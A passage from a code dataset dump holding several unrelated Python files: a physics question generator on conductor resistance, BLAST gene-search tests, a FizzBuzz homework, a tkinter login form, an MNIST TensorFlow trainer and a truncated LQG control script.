{2} m.'.format(x_eq, diameter, d_eq, conductor, each))\n        b6 = seqg('Built into the cable is a conductor 
which consists of an insulating sheath that surrounds {0} copper wires, {3} {1} {2} m.'.format(x_eq, diameter, d_eq, each))\n b_part = choiceg(b0,b1,b2,b3,b4,b5,b6)\n\n p_eq = Eq(p, p_val)\n c0 = seqg('The resistivity of copper is',p_eq,'Ωm.')\n c1 = seqg('''The copper's resistivity is''',p_eq,'Ωm.')\n c2 = seqg(p_eq, 'Ωm is the resistivity of copper.')\n c3 = seqg(p_eq, '''Ωm is the copper's resistivity.''')\n c4 = seqg('Take the resistivity of copper as being', p_eq, 'Ωm.')\n c5 = seqg('''Take the copper's resistivity as being''', p_eq, 'Ωm.')\n c6 = seqg('Use',p_eq, 'Ωm as the resistivity of the copper.')\n c7 = seqg('Use',p_eq, '''Ωm as the copper's resistivity.''')\n c_part = choiceg(c0,c1,c2,c3,c4,c5,c6,c7)\n\n Calculate = choiceg('Calculate', 'Compute', 'Find', 'Find a numerical answer for')\n calculate = choiceg('calculate', 'compute', 'find', 'find a numerical answer for')\n\n ll = str(l)\n xx = str(x)\n dd = str(d)\n pp = str(p)\n\n terms1 = seqg(perg(ll + ',', dd + ',', pp + ','), 'and', xx)\n terms2 = seqg(perg(ll + ',', dd + ',', xx + ','), 'and', pp)\n terms3 = seqg(perg(ll + ',', xx + ',', pp + ','), 'and', dd)\n terms4 = seqg(perg(xx + ',', dd + ',', pp + ','), 'and', ll)\n terms = choiceg(terms1, terms2, terms3, terms4)\n\n d0 = seqg(Calculate,'the resistance of the conductor in terms of', terms)\n d1 = seqg('''{0} the conductor's resistance in terms of {1}.'''.format(Calculate, terms))\n d2 = seqg('{0} the resistance of the conductor in the cable in terms of {1}.'.format(Calculate,terms))\n d3 = seqg('In terms of {0} {1} the resistance of the conductor.'.format(terms, calculate))\n d4 = seqg('''In terms of {0} {1} the conductor's resistance.'''.format(terms, calculate))\n d5 = seqg('In terms of {0} {1} the resistance of the conductor in the cable.'.format(terms,calculate))\n\n d_part = choiceg(d0,d1,d2,d3,d4,d5)\n\n q = seqg(a_part, b_part, c_part, d_part)\n\n return q\n\n def A(s, l_val, x_val, d_val, diameter_radius, p_val, diameter, l,x,d,p):\n '''\n Important Note: first variables are the not consistent variables followed\n by the consistent ones. 
See sample QA example if you need to.\n        '''\n        seqg, perg, choiceg = s.seqg, s.perg, s.choiceg\n\n        R = symbols('R')\n        pi = np.pi\n        if diameter == 'diameter':\n            A = pi*((d/2)**2)\n        else:\n            A = pi*(d**2)\n\n        Eq(1/R, x*A/(p*l))\n        res1 = Eq(R, (p*l)/(x*A))\n        res2 = Eq((p*l)/(x*A), R)\n        resistance = choiceg(res1,res2)\n\n        iis = choiceg('is', 'is equal to', 'equals')\n        eq_resist = choiceg('', 'equivalent resistance', 'resistance')\n\n        ll = str(l)\n        xx = str(x)\n        dd = str(d)\n        pp = str(p)\n        \n        terms1 = seqg(perg(ll + ',', dd + ',', pp + ','), 'and', xx)\n        terms2 = seqg(perg(ll + ',', dd + ',', xx + ','), 'and', pp)\n        terms3 = seqg(perg(ll + ',', xx + ',', pp + ','), 'and', dd)\n        terms4 = seqg(perg(xx + ',', dd + ',', pp + ','), 'and', ll)\n        terms = choiceg(terms1, terms2, terms3, terms4)\n\n        a0 = seqg(resistance, 'is the',eq_resist,'of the conductor in terms of', terms)\n        a1 = seqg('''{0} is the conductor's {1} in terms of {2}.'''.format(resistance, eq_resist, terms))\n        a2 = seqg(resistance, 'is the',eq_resist,'of the conductor in the cable in terms of',terms)\n        a3 = seqg('The',eq_resist,'of the conductor', iis, resistance)\n        a4 = seqg('''The conductor's''',eq_resist,iis, resistance)\n        a5 = seqg('The', eq_resist,'of the conductor in the cable',iis, resistance)\n        a6 = seqg('In terms of',terms,'the',eq_resist,'of the conductor',iis,resistance)\n        a7 = seqg('In terms of',terms,resistance,iis,'the',eq_resist,'of the conductor.')\n\n\n        a = choiceg(a0, a1, a2, a3, a4, a5,a6,a7)\n        return a\n\n    ##\n\n    def get_qa(self,seed):\n        '''\n        Example of how Q,A are formed in general.\n        '''\n        # set seed\n        self.seed_all(seed)\n        # get variables for qa and register them for the current q,a\n        variables, variables_consistent = self._create_all_variables()\n        # get concrete qa strings\n        q_str = self.Q(*variables,*variables_consistent)\n        a_str = self.A(*variables,*variables_consistent)\n        return q_str, a_str\n\n## Some helper functions to check the formats are coming out correctly\n\n##\n\ndef check_single_question_debug(qagenerator):\n    '''\n    Checks by printing a single question in debug mode\n    '''\n    qagenerator.debug = True\n    q,a = qagenerator.get_qa(seed=1)\n    print('qagenerator.debug = ', qagenerator.debug)\n    print('q: ', q)\n    print('a: ', a)\n\ndef check_single_question(qagenerator):\n    '''\n    Checks by printing a single question with a random seed\n    '''\n    q,a = qagenerator.get_qa(seed=random.randint(0,1000))\n    print('qagenerator.debug = ', qagenerator.debug)\n    print('q: ', q)\n    print('a: ', a)\n\ndef check_mc(qagenerator):\n    '''\n    Checks by printing the MC(Multiple Choice) option\n    '''\n    nb_answers_choices = 10\n    for seed in range(3):\n        #seed = random.randint(0,100)\n        q_str, ans_list = qagenerator.generate_single_qa_MC(nb_answers_choices=nb_answers_choices,seed=seed)\n        print('\\n-------seed-------: ',seed)\n        print('q_str:\\n',q_str)\n        print('-answers:')\n        print(\"\\n\".join(ans_list))\n\ndef check_many_to_many(qagenerator):\n    for seed in range(3):\n        q,a = qagenerator.generate_many_to_many(nb_questions=4,nb_answers=3,seed=seed)\n        print('-questions:')\n        print(\"\\n\".join(q))\n        print('-answers:')\n        print(\"\\n\".join(a))\n\ndef check_many_to_one_consis(qagenerator):\n    for seed in range(3):\n        print()\n        q,a = qagenerator.generate_many_to_one(nb_questions=5,seed=seed)\n        print(\"\\n\".join(q))\n        print('a: ', a)\n        #print(\"\\n\".join(a))\n\ndef check_many_to_one_consistent_format(qagenerator):\n    nb_qa_pairs,nb_questions = 10,3\n    qa_pair_list = qagenerator.generate_many_to_one_consistent_format(nb_qa_pairs,nb_questions)\n    for 
q_list,a_consistent_format in qa_pair_list:\n print()\n print(\"\\n\".join(q_list))\n print('a: ', a_consistent_format)\n\nif __name__ == '__main__':\n qagenerator = QA_constraint()\n check_single_question(qagenerator)\n user_test.run_unit_test_for_user(QA_constraint)","sub_path":"math_taxonomy/physics/electricity_and_magnetism/resistance_of_conductor.py","file_name":"resistance_of_conductor.py","file_ext":"py","file_size_in_byte":12842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327312002","text":"#!/usr/bin/env python3\nfrom olctools.accessoryFunctions.accessoryFunctions import MetadataObject\nfrom genemethods.geneseekr.geneseekr import GeneSeekr\nfrom genemethods.geneseekr.blast import BLAST\nimport multiprocessing\nfrom glob import glob\nfrom time import time\nimport os\n\ntest_path = os.path.abspath(os.path.dirname(__file__))\n\n__author__ = 'adamkoziol'\n\n\ndef variables():\n v = MetadataObject()\n datapath = os.path.join(test_path, 'testdata')\n v.sequencepath = os.path.join(datapath, 'aa_sequences')\n v.targetpath = os.path.join(datapath, 'databases', 'resfinder')\n v.reportpath = os.path.join(datapath, 'reports')\n v.cutoff = 70\n v.evalue = '1E-05'\n v.align = False\n v.unique = False\n v.resfinder = False\n v.virulencefinder = False\n v.numthreads = multiprocessing.cpu_count()\n v.start = time()\n return v\n\n\ndef method_init(analysistype, program, align, unique):\n global var\n var = variables()\n var.analysistype = analysistype\n var.program = program\n var.align = align\n var.unique = unique\n method = BLAST(var)\n return method\n\n\ntblastn_method = method_init(analysistype='resfinder',\n program='tblastn',\n align=True,\n unique=True)\n\n\ndef test_parser():\n assert os.path.basename(tblastn_method.targets[0]) == 'beta-lactam.tfa'\n\n\ndef test_combined_files():\n assert os.path.isfile(tblastn_method.combinedtargets)\n\n\ndef test_strains():\n assert os.path.isfile(tblastn_method.strains[0])\n\n\ndef test_strain():\n assert os.path.basename(tblastn_method.strains[0]) == 'amr_test.fasta'\n\n\ndef test_makeblastdb():\n global geneseekr\n geneseekr = GeneSeekr()\n geneseekr.makeblastdb(fasta=tblastn_method.combinedtargets,\n program=tblastn_method.program)\n assert os.path.isfile(os.path.join(var.targetpath, 'combinedtargets.nsq'))\n\n\ndef test_variable_populate():\n global targetfolders\n global targetfiles\n global records\n targetfolders, targetfiles, records = \\\n geneseekr.target_folders(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n\n\ndef test_targetfolders():\n assert os.path.basename(list(targetfolders)[0]) == 'resfinder'\n\n\ndef test_targetfiles():\n assert targetfiles[0] == tblastn_method.combinedtargets\n\n\ndef test_records():\n assert records[targetfiles[0]]['ampH_2_HQ586946']\n\n\ndef test_tblastn():\n global tblastn_report\n tblastn_method.metadata = geneseekr.run_blast(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n program=tblastn_method.program,\n outfmt=tblastn_method.outfmt,\n evalue=tblastn_method.evalue,\n num_threads=tblastn_method.cpus)\n tblastn_report = os.path.join(var.reportpath, 'amr_test_tblastn_resfinder.tsv')\n assert os.path.isfile(tblastn_report)\n\n\ndef test_enhance_report_parsing():\n geneseekr.parseable_blast_outputs(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n fieldnames=tblastn_method.fieldnames,\n program=tblastn_method.program)\n header = open(tblastn_report).readline()\n 
assert header.split('\\t')[0] == 'query_id'\n\n\ndef test_tblastn_results():\n with open(tblastn_report) as blast_results:\n next(blast_results)\n data = blast_results.readline()\n results = data.split('\\t')\n assert int(results[2]) >= 50\n\n\ndef test_blast_parse():\n tblastn_method.metadata = geneseekr.unique_parse_blast(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n fieldnames=tblastn_method.fieldnames,\n cutoff=tblastn_method.cutoff,\n program=tblastn_method.program)\n for sample in tblastn_method.metadata:\n assert sample.resfinder.queryranges['contig2'] == [[1, 264]]\n\n\ndef test_filter():\n tblastn_method.metadata = geneseekr.filter_unique(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastlist[0]['percentidentity'] >= 70\n\n\ndef test_dict_create():\n tblastn_method.metadata = geneseekr.dict_initialise(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype)\n for sample in tblastn_method.metadata:\n assert type(sample.resfinder.protseq) is dict\n\n\ndef test_report_creation():\n tblastn_method.metadata = geneseekr.resfinder_reporter(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n reportpath=tblastn_method.reportpath,\n align=tblastn_method.align,\n program=tblastn_method.program,\n targetpath=tblastn_method.targetpath,\n cutoff=tblastn_method.cutoff)\n\n\ndef test_report_existance():\n global geneseekr_report\n geneseekr_report = os.path.join(tblastn_method.reportpath, 'resfinder_tblastn.xlsx')\n assert os.path.isfile(geneseekr_report)\n\n\ndef test_report_row():\n for sample in tblastn_method.metadata:\n assert sorted(sample.resfinder.sampledata)[0][0] == 'blaOXA'\n\n\ndef test_parse_results():\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastresults['blaOXA_427_1_KX827604'] == 94.34\n\n\ndef test_aaseq():\n for sample in tblastn_method.metadata:\n assert sample.resfinder.blastlist[0]['query_sequence'][:5] == 'MSRIL'\n\n\ndef test_fasta_create():\n global fasta_file\n geneseekr.export_fasta(metadata=tblastn_method.metadata,\n analysistype=tblastn_method.analysistype,\n reportpath=tblastn_method.reportpath,\n cutoff=tblastn_method.cutoff,\n program=tblastn_method.program)\n fasta_file = os.path.join(var.reportpath, 'amr_test_resfinder.fasta')\n assert os.path.isfile(fasta_file)\n header = open(fasta_file, 'r').readline().rstrip()\n assert header == '>amr_test_blaOXA_427_1_KX827604'\n\n\ndef test_combined_targets_clean():\n os.remove(tblastn_method.combinedtargets)\n\n\ndef test_makeblastdb_clean():\n databasefiles = glob(os.path.join(var.targetpath, 'combinedtargets.n*'))\n for dbfile in databasefiles:\n os.remove(dbfile)\n\n\ndef test_remove_tblastn_report():\n os.remove(tblastn_report)\n\n\ndef test_remove_fasta_file():\n os.remove(fasta_file)\n\n\ndef test_remove_geneseekr_report():\n os.remove(geneseekr_report)\n\n\ndef test_remove_report_path():\n os.rmdir(tblastn_method.reportpath)\n","sub_path":"tests/test_tblastn.py","file_name":"test_tblastn.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"415122130","text":"\n\ndef get_ranges(list):\n list.append(0)\n n = \"\"\n low = 0\n for i in range (1,len(list)):\n if list[i] != list[i-1]+1:\n if list[low] == list[i-1]:\n n+=str(list[low]) + \" \"\n low = i\n else:\n n+=str(list[low]) + \"-\"+str(list[i-1]) + \" \"\n low = i\n 
list.pop()\n return n\n\nlist = [1,3,5,7,8,9,10,15]\nprint(get_ranges(list))\n\ndef fizzbuzz(number):\n if number % 3 == 0 and number % 5 == 0:\n return \"FizzBuzz\"\n elif number % 3 == 0:\n return \"fizz\"\n elif number % 5 == 0:\n return \"buzz\"\n else:\n return number\n\n\nfor i in range(100):\n print (fizzbuzz(i),end =\" \")\n\n\n","sub_path":"Tasks/Apekun_Tasks/HomeTask4/Homework4.py","file_name":"Homework4.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349601536","text":"from tkinter.ttk import *\r\nfrom tkinter import *\r\n\r\nbase = Tk()\r\nbase.title(\"you can write anything here \")\r\nbase.geometry(\"500x300\")\r\n\r\nlb1 = Label(base, text=\"Enter User ID\")\r\nlb1.grid(row=0, column=0)\r\n\r\nphoto = PhotoImage(file=r'C:\\Users\\Lenovo\\Downloads\\UIHere.png')\r\n\r\ntxt1 = Entry(base, width=15)\r\ntxt1.grid(row=0, column=1)\r\n\r\nlb2 = Label(base, text=\"Enter Password Here\")\r\nlb2.grid(row=1, column=0)\r\n\r\ntxt2 = Entry(base, width=15, show='*')\r\ntxt2.grid(row=1, column=1)\r\n\r\nbtn1 = Button(base, image=photo)\r\nbtn1['text'] = \"Save Data\"\r\nbtn1['font'] = (\"Arial Bold\", 15)\r\nbtn1.place(x=100, y=150)\r\n\r\nbtn2 = Button(base)\r\nbtn2.configure(text=\"Submit\", font=(\"Arial Bold\", 20))\r\nbtn2.place(x=200, y=120)\r\nbase.mainloop()","sub_path":"GUI_example2.py","file_name":"GUI_example2.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183493060","text":"import os\r\nimport time\r\nimport numpy as np\r\n\r\nimport tensorflow as tf\r\n\r\nfrom mnistreader import reader\r\nimport mnist\r\n\r\nFLAGS = None\r\n\r\n\r\nbatch_size=50\r\ndef placeholder_inputs(batch_size):\r\n images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, 784))\r\n labels_placeholder = tf.placeholder(tf.int32, shape=(batch_size))\r\n return images_placeholder, labels_placeholder\r\n\r\n\r\ndef fill_feed_dict(data_set, images_pl, labels_pl):\r\n \"\"\"Fills the feed_dict for training the given step.\r\n\r\n A feed_dict takes the form of:\r\n feed_dict = {\r\n : ,\r\n ....\r\n }\r\n\r\n Args:\r\n data_set: The set of images and labels, from input_data.read_data_sets()\r\n images_pl: The images placeholder, from placeholder_inputs().\r\n labels_pl: The labels placeholder, from placeholder_inputs().\r\n\r\n Returns:\r\n feed_dict: The feed dictionary mapping from placeholders to values.\r\n \"\"\"\r\n # Create the feed_dict for the placeholders filled with the next\r\n # `batch size` examples.\r\n images_feed, labels_feed = data_set.next_batch(FLAGS.batch_size,\r\n FLAGS.fake_data)\r\n feed_dict = {\r\n images_pl: images_feed,\r\n labels_pl: labels_feed,\r\n }\r\n return feed_dict\r\n\r\n\r\ndef do_eval(sess, eval_correct,data_set,batch_size,images_placeholder,labels_placeholder,keep_prob):\r\n \"\"\"Runs one evaluation against the full epoch of data.\r\n\r\n Args:\r\n sess: The session in which the model has been trained.\r\n eval_correct: The Tensor that returns the number of correct predictions.\r\n images_placeholder: The images placeholder.\r\n labels_placeholder: The labels placeholder.\r\n data_set: The set of images and labels to evaluate, from\r\n input_data.read_data_sets().\r\n \"\"\"\r\n # And run one epoch of eval.\r\n true_count = 0 # Counts the number of correct predictions.\r\n steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n oldpointer= 
data_set.pointer\r\n  data_set.pointer=data_set.readlength\r\n  print(data_set.pointer)\r\n  #steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n\r\n  num_examples = steps_per_epoch * FLAGS.batch_size\r\n  for step in range(steps_per_epoch):\r\n    inputs,answers=data_set.list_tags(batch_size,test=False)\r\n    feed_dict= {\r\n        images_placeholder:inputs,\r\n        labels_placeholder:answers,\r\n        keep_prob:1\r\n    }\r\n\r\n    true_count += sess.run(eval_correct, feed_dict=feed_dict)\r\n  precision = float(true_count) / num_examples\r\n  print('fakeeval Num examples: %d Num correct: %d Precision @ 1: %0.04f' %\r\n        (num_examples, true_count, precision))\r\n  data_set.pointer=oldpointer\r\n\r\n\r\n\r\n\r\ndef do_evalfake(sess, eval_correct,data_set,batch_size,images_placeholder,labels_placeholder,logits,keep_prob):\r\n  \"\"\"Runs one evaluation against the full epoch of data.\r\n\r\n  Args:\r\n    sess: The session in which the model has been trained.\r\n    eval_correct: The Tensor that returns the number of correct predictions.\r\n    images_placeholder: The images placeholder.\r\n    labels_placeholder: The labels placeholder.\r\n    data_set: The set of images and labels to evaluate, from\r\n      input_data.read_data_sets().\r\n  \"\"\"\r\n  # And run one epoch of eval.\r\n  true_count = 0  # Counts the number of correct predictions.\r\n  steps_per_epoch = data_set.readlength // FLAGS.batch_size // 6\r\n  oldpointer= data_set.pointer\r\n  data_set.pointer=data_set.readlength *5 //6\r\n  \r\n  #steps_per_epoch = data_set.readlength // FLAGS.batch_size \r\n\r\n  num_examples = steps_per_epoch * FLAGS.batch_size\r\n  for step in range(steps_per_epoch):\r\n    # print('pointer1:',data_set.pointer)\r\n    inputs,answers=data_set.list_tags(batch_size,test=True)\r\n    feed_dict= {\r\n        images_placeholder:inputs,\r\n        labels_placeholder:answers,\r\n        keep_prob:0.5\r\n    }\r\n\r\n    newcount,logi=sess.run([eval_correct,logits], feed_dict=feed_dict)\r\n    true_count += newcount\r\n    for i0 in range(FLAGS.batch_size):\r\n        lgans=np.argmax(logi[i0])\r\n    for i0 in range(FLAGS.batch_size):\r\n        lgans=np.argmax(logi[i0])\r\n        if(lgans!=answers[i0] and False):\r\n            for tt in range(784):\r\n                if(tt%28==0): print(' ');\r\n                if(inputs[i0][tt]!=0):\r\n                    print('1',end=' ');\r\n                else:\r\n                    print('0',end=' ');\r\n#            print('np',np.argmax(i),answers,answers[i0],'np')\r\n            print(lgans,answers[i0])\r\n    # Update the events file.\r\n  precision = float(true_count) / num_examples\r\n  print('Num examples: %d Num correct: %d Precision @ 1: %0.04f' %\r\n        (num_examples, true_count, precision),end='')\r\n  data_set.pointer=oldpointer\r\n  #print('pointer2:',data_set.pointer)\r\n\r\n\r\n\r\ndef run_training():\r\n  \"\"\"Train MNIST for a number of steps.\"\"\"\r\n  # Get the sets of images and labels for training, validation, and\r\n  # test on MNIST.\r\n  data_sets=reader(patchlength=0,\\\r\n                   maxlength=300,\\\r\n                   embedding_size=100,\\\r\n                   num_verbs=10,\\\r\n                   allinclude=False,\\\r\n                   shorten=False,\\\r\n                   shorten_front=False,\\\r\n                   testflag=False,\\\r\n                   passnum=0,\\\r\n                   dpflag=False)\r\n\r\n  \r\n  \r\n\r\n  # Tell TensorFlow that the model will be built into the default Graph.\r\n  with tf.Graph().as_default():\r\n    # Generate placeholders for the images and labels.\r\n    images_placeholder, labels_placeholder = placeholder_inputs(\r\n        FLAGS.batch_size)\r\n\r\n    # Build a Graph that computes predictions from the inference model.\r\n    logits,keep_prob = mnist.inference(images_placeholder,\r\n                                       FLAGS.hidden1,\r\n                                       FLAGS.hidden2)\r\n\r\n    # Add to the Graph the Ops for loss calculation.\r\n    loss = mnist.loss(logits, labels_placeholder)\r\n\r\n    # Add to the Graph the Ops that calculate and apply gradients.\r\n    train_op = mnist.training(loss, FLAGS.learning_rate)\r\n\r\n    # Add the Op to compare the logits to the labels during evaluation.\r\n    eval_correct = mnist.evaluation(logits, labels_placeholder)\r\n\r\n    # Build the summary Tensor based on the TF collection of Summaries.\r\n    summary = tf.summary.merge_all()\r\n\r\n    # Add the variable initializer Op.\r\n    init = tf.global_variables_initializer()\r\n\r\n    # Create a saver for writing training checkpoints.\r\n    saver = tf.train.Saver()\r\n\r\n    # Create a session for running Ops on the Graph.\r\n    sess = tf.Session()\r\n\r\n    # Instantiate a SummaryWriter to output summaries and the Graph.\r\n    summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)\r\n\r\n    # And then after everything is built:\r\n\r\n    # Run the Op to initialize the variables.\r\n    with tf.Session() as session:\r\n      sess.run(init)\r\n      if True:\r\n        model_file=tf.train.latest_checkpoint(FLAGS.log_dir)\r\n        saver.restore(sess,model_file)\r\n\r\n      # Start the training loop.\r\n      start_time = time.time()\r\n      for step in range(FLAGS.max_steps):\r\n\r\n        # Fill a feed dictionary with the actual set of images and labels\r\n        # for this particular training step.\r\n\r\n        \r\n        inputs,answers=data_sets.list_tags(FLAGS.batch_size,test=False)\r\n#        print(len(inputs),len(inputs[0]),inputs[0])\r\n#        input()\r\n        inputs2=[]\r\n        for i in range(len(inputs)):\r\n            inputs2.append(inputs[i]/255)\r\n#        print(len(inputs2),len(inputs2[0]),inputs2[0])\r\n#        input()\r\n        feed_dict = {\r\n            images_placeholder: inputs2,\r\n            labels_placeholder: answers,\r\n            keep_prob:0.5\r\n        }\r\n        # Run one step of the model. The return values are the activations\r\n        # from the `train_op` (which is discarded) and the `loss` Op. 
To\r\n # inspect the values of your Ops or variables, you may include them\r\n # in the list passed to sess.run() and the value tensors will be\r\n # returned in the tuple from the call.\r\n _, loss_value,logi = sess.run([train_op, loss,logits],\r\n feed_dict=feed_dict)\r\n\r\n duration = time.time() - start_time\r\n\r\n # Write the summaries and print an overview fairly often.\r\n if step % 100 == 0:\r\n # Print status to stdout.\r\n print('Step %d: loss = %.2f (%.3f sec)' % (step, loss_value, duration))\r\n# print(logi)\r\n# print(answers)\r\n for i0 in range(FLAGS.batch_size):\r\n lgans=np.argmax(logi[i0])\r\n if(lgans!=answers[i0] and False):\r\n for tt in range(784):\r\n if(tt%28==0): print(' ');\r\n if(inputs[i0][tt]!=0):\r\n print('1',end=' ');\r\n else:\r\n print('0',end=' ');\r\n# print('np',np.argmax(i),answers,answers[i0],'np')\r\n print(lgans,answers[i0])\r\n # Update the events file.\r\n summary_str = sess.run(summary, feed_dict=feed_dict)\r\n summary_writer.add_summary(summary_str, step)\r\n summary_writer.flush()\r\n if (step + 1) % 500 == 0 or (step + 1) == FLAGS.max_steps:\r\n #print('Training Data Eval:')\r\n do_eval(sess,\r\n eval_correct,data_sets,FLAGS.batch_size,\r\n images_placeholder,\r\n labels_placeholder,keep_prob)\r\n do_evalfake(sess,\r\n eval_correct,data_sets,FLAGS.batch_size,\r\n images_placeholder,\r\n labels_placeholder,\r\n logits,keep_prob)\r\n # Save a checkpoint and evaluate the model periodically.\r\n #if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:\r\n checkpoint_file = os.path.join(FLAGS.log_dir, 'model.ckpt')\r\n saver.save(sess, checkpoint_file, global_step=step)\r\n print('saved to',checkpoint_file)\r\n '''\r\n # Evaluate against the training set.\r\n print('Training Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.train)\r\n # Evaluate against the validation set.\r\n print('Validation Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.validation)\r\n # Evaluate against the test set.\r\n print('Test Data Eval:')\r\n do_eval(sess,\r\n eval_correct,\r\n images_placeholder,\r\n labels_placeholder,\r\n data_sets.test)\r\n '''\r\n\r\ndef main(_):\r\n# if tf.gfile.Exists(FLAGS.log_dir):\r\n# tf.gfile.DeleteRecursively(FLAGS.log_dir)\r\n# tf.gfile.MakeDirs(FLAGS.log_dir)\r\n run_training()\r\n\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","sub_path":"fully_connected_feed2long.py","file_name":"fully_connected_feed2long.py","file_ext":"py","file_size_in_byte":11227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223530258","text":"import numpy as np\nimport scipy as sp\nfrom IPython import embed\nimport argparse\n\nclass ADAM(object):\n def __init__(self, dx, lr = None):\n self.dx = dx\n self.beta1 = 0.9\n self.beta2 = 0.999\n self.m = np.zeros(self.dx)\n self.v = np.zeros(self.dx)\n if lr is None: \n self.alpha = 0.001\n else:\n self.alpha = lr\n self.t = 0\n self.epislon = 1e-8\n\n def update(self, theta, grad, alpha = None):\n self.t += 1\n self.m = (1.-self.beta1)*grad + self.beta1*self.m\n self.v = (1.-self.beta2)*(grad**2) + self.beta2*self.v\n hat_m = self.m / (1. - self.beta1**self.t)\n hat_v = self.v / (1. 
- self.beta2**self.t)\n if alpha is None:\n return theta - self.alpha*hat_m/(np.sqrt(hat_v) + self.epislon)\n else:\n return theta - alpha*hat_m/(np.sqrt(hat_v) + self.epislon)\n\nclass PlainGD(object):\n def __init__(self, dx, lr = None):\n self.dx = dx\n \n def update(self, theta, grad, alpha):\n return theta - alpha * grad\n\nclass LQG_env(object):\n def __init__(self, method_name):\n\n self.method_name = method_name\n\n self.A = np.zeros((3,3))\n self.A[0,0] = 1.01\n self.A[0,1] = 0.01\n self.A[1,0] = 0.01\n self.A[1,1] = 1.01\n self.A[1,2] = 0.01\n self.A[2,1] = 0.01\n self.A[2,2] = 1.01\n\n self.B = np.eye(3)\n self.Q = 1e-3*np.eye(3)\n self.R = np.eye(3)\n\n self.dx = 3\n self.du = 3\n\n self.init_state_mean = np.ones(self.dx)*5\n self.init_state_cov = np.eye(self.dx)*0.1\n\n self.state = None\n\n self.noise_cov = np.eye(self.dx)*0.001 \n\n self.K = 1e-3*np.random.randn(self.du, self.dx) #np.zeros((3,3)) #u = Kx\n self.P_K = None\n \n self.gamma = 0.998\n\n self.ADAM_optimizer = ADAM(dx = self.dx*self.du, lr = None)\n #self.Plain_GD = PlainGD(dx = self.dx*self.du)\n\n\n def reset(self):\n self.state = np.random.multivariate_normal(mean = self.init_state_mean, cov = self.init_state_cov)\n return self.state\n\n def step(self, x, u):\n cost = x.dot(self.Q).dot(x) + u.dot(self.R).dot(u)\n next_state = self.A.dot(x) + self.B.dot(u)\n next_state += np.random.multivariate_normal(mean = np.zeros(self.dx), cov = self.noise_cov)\n return next_state, cost, False\n\n def Fixed_point_iteration_Raccati_optimal_equation(self, max_iter):\n max_iter = int(max_iter)\n P_K = np.zeros((self.dx, self.dx))\n current_P_K = np.zeros((self.dx, self.dx))\n #max_iter = 200\n for i in range(2*max_iter):\n new_P_K = (self.Q + self.A.T.dot(current_P_K).dot(self.A) - \n self.A.T.dot(current_P_K).dot(self.B).dot(np.linalg.inv(self.B.T.dot(current_P_K).dot(self.B)+self.R)).dot(self.B.T).dot(current_P_K).dot(self.A))\n if np.linalg.norm(new_P_K - current_P_K) < 1e-5:\n break;\n current_P_K = np.copy(new_P_K)\n self.P_K = np.copy(current_P_K)\n \n def optimal_K(self):\n self.Fixed_point_iteration_Raccati_optimal_equation(max_iter = 500)\n self.K = -np.linalg.inv(self.B.T.dot(self.P_K).dot(self.B) + self.R).dot(self.B.T).dot(self.P_K).dot(self.A)\n\n def Fixed_point_iteration_Raccati_equation(self, max_iter):\n max_iter = int(max_iter)\n P_K = np.zeros((self.dx, self.dx))\n current_P_K = np.zeros((self.dx, self.dx))\n #max_iter = 200\n for i in range(2*max_iter):\n new_P_K = self.Q + self.K.T.dot(self.R).dot(self.K) + self.gamma*(self.A+self.B.dot(self.K)).T.dot(current_P_K).dot(self.A+self.B.dot(self.K))\n if np.linalg.norm(new_P_K - current_P_K) < 1e-5:\n break;\n current_P_K = np.copy(new_P_K)\n self.P_K = np.copy(current_P_K)\n\n def Jacobian_with_vectorized_K(self, x):\n dim_K = self.du*self.dx\n J = np.zeros((self.du, dim_K))\n for i in range(self.du):\n J[i, i*self.dx:i*self.dx+self.dx] = x\n return J\n\n def empircal_off_policy_gradient(self, xs):\n batch_size = xs.shape[0]\n us = (self.K.dot(xs.T)).T #u = Kx\n grad_vectorized_K = np.zeros(self.dx*self.du)\n for i in range(xs.shape[0]):\n g_u = 2*self.R.dot(us[i]) + 2*self.gamma*self.B.T.dot(self.P_K).dot(self.A.dot(xs[i])+self.B.dot(us[i]))\n grad_vectorized_K += self.Jacobian_with_vectorized_K(xs[i]).T.dot(g_u) \n return grad_vectorized_K/(batch_size*1.)\n \n def empircal_off_policy_newton_gradient(self, xs):\n batch_size = xs.shape[0]\n us = (self.K.dot(xs.T)).T #u = Kx\n HinvGrad_vecotirzed_K = np.zeros(self.dx*self.du)\n H_u = 2*self.R + 
